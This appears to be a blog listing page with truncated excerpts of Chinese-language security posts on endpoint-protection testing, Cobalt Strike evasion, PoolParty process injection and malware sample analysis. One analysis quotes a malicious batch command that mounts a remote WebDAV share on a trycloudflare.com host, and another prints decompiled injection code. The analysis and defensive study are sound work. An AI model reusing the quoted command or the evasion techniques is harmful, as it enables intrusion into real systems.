OpenCode + Oh My OpenCode 配置 这篇文章记录我目前在本地使用的 OpenCode + Oh My OpenCode 配置. 默认开启 fast 模式 "serviceTier": "priority" 1) OpenCode： { "$schema": "https://opencode.ai/config.json", "provider": {...

很多端点产品的宣传都喜欢强调“覆盖率”——覆盖了多少 ATT&CK 技术、打到了多少检测点、命中了多少恶意行为。问题是，真实入侵并不是一堆彼此独立的技术点，而是一条连续的攻击链。对防守方来说，真正重要的不只是“看见了什么”，而是拦在了哪里、告警能不能串起来、以及这些信号能不能支撑后续处置。 这篇文章整理了一次 单机 Windows 场景 下的端点防护评估。我把一条 15 步的入侵链...

Advanced Techniques for Cobalt Strike Evasion and Detection Bypass Note: This is my first blog post in English, so I welcome any feedback on clarity or style. In this article I describe how we...

记录学习Poolparty注入技术的笔记 - 2025-5-21 poolparty，一种只需要在远程线程中分配和写入操作，而无需执行操作的注入技术，其核心是利用了windows的线程池作为攻击对象 由于其并没有直接执行shellcode，所以大部分edr/av无法检测（当时，现在就不一定了） SafeBreach原文地址 第一种注入技术 复写workerfactory Startro...

本样本来自卡饭论坛(Kafan) 样本行为&逆向 命令行注入分支 v5 = strstr(GetCommandLineA(), "-proc "); if ( v5 ) { DWORD pid = sub_170122D18(v5 + 6); HANDLE h = OpenProcess(SYNCHRONIZE, FALSE, pid); W...

本样本来自卡饭论坛(Kafan) 样本行为概述 双击执行 .BAT 文件后，调用 net 组件加载远程共享磁盘： net use Z: "\\digital-childrens-junior-cure.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no ...

目录 目录 引言 威胁现状分析 传统EPP/EDR的局限 初步尝试 Elastic + SentinelOne 组合实践 近一年后的新的尝试 总结与展望 引言 有人可能认为，在当下的网络环境中，只要保持良好的上网习惯，甚至不装杀毒软件就足够了。但实际上，情况并非如此。如今的网络威胁与2000年左右病毒作者猖獗、特征明显的时代已经大不相同。现在的病...